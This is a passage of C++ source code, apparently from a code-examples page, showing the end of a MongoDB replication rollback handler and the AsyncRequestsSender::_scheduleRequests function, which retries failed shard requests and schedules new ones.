                      << "; expected to be in state " << MemberState(MemberState::RS_ROLLBACK)
                      << " but found self in " << _replCoord->getMemberState();
        }
        return;
    }
    if (ErrorCodes::UnrecoverableRollbackError == status.code()) {
        fassertNoTrace(28723, status);
    }
    warning() << "rollback cannot proceed at this time (retrying later): " << redact(status);
}
Example #30
0
void AsyncRequestsSender::_scheduleRequests() {
    invariant(!_stopRetrying);
    // Schedule remote work on hosts for which we have not sent a request or need to retry.
    for (size_t i = 0; i < _remotes.size(); ++i) {
        auto& remote = _remotes[i];

        // First check if the remote had a retriable error, and if so, clear its response field so
        // it will be retried.
        if (remote.swResponse && !remote.done) {
            // We check both the response status and command status for a retriable error.
            Status status = remote.swResponse->getStatus();
            if (status.isOK()) {
                status = getStatusFromCommandResult(remote.swResponse->getValue().data);
            }

            if (status.isOK()) {
                status = getWriteConcernStatusFromCommandResult(remote.swResponse->getValue().data);
            }

            if (!status.isOK()) {
                // There was an error with either the response or the command.
                auto shard = remote.getShard();
                if (!shard) {
                    remote.swResponse =
                        Status(ErrorCodes::ShardNotFound,
                               str::stream() << "Could not find shard " << remote.shardId);
                } else {
                    if (remote.shardHostAndPort) {
                        shard->updateReplSetMonitor(*remote.shardHostAndPort, status);
                    }
                    if (shard->isRetriableError(status.code(), _retryPolicy) &&
                        remote.retryCount < kMaxNumFailedHostRetryAttempts) {
                        LOG(1) << "Command to remote " << remote.shardId << " at host "
                               << *remote.shardHostAndPort
                               << " failed with retriable error and will be retried "
                               << causedBy(redact(status));
                        ++remote.retryCount;
                        remote.swResponse.reset();
                    }
                }
            }
        }

        // If the remote does not have a response or pending request, schedule remote work for it.
        if (!remote.swResponse && !remote.cbHandle.isValid()) {
            auto scheduleStatus = _scheduleRequest(i);
            if (!scheduleStatus.isOK()) {
                remote.swResponse = std::move(scheduleStatus);

                // Push a noop response to the queue to indicate that a remote is ready for
                // re-processing due to failure.
                _responseQueue.producer.push(boost::none);
            }
        }
    }
}